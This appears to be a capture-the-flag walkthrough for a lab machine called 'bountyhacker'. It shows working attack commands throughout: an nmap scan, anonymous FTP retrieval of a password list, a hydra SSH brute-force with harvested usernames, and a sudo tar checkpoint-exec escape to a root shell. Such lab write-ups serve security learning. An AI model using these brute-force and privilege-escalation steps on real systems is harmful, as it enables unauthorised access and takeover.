You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
Enumeration
I first ran a Nmap service scan to detect open services.
nmap -sC -sV 10.10.10.10
This returned port 21(ftp), 22(ssh), 80(http). The good thing about running -sC (default scripts) is that it identified anonymous FTP login. So, we can connect via FTP.
ftp 10.10.10.10
One of the files available to us is locks.txt, which contains a list of what looks to be passwords.
Exploitation
On the webserver, we’re given a list of members of the ‘Red Dragon Syndicate’.
spike
jet
ed
edward
ein
faye
lin
We can use this list of users with the list of passwords to see if we can crack into SSH.
hydra -L users.txt -P locks.txt 10.10.10.10 ssh
We were able to get access to lin!
Privilege Escalation
Taking a look at sudo -l
User lin may run the following commands on bountyhacker:
GTFOBins has some nifty tar commands which can help escalate privileges.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This command will allow us to execute /bin/sh as sudo, and thus give us a shell as root!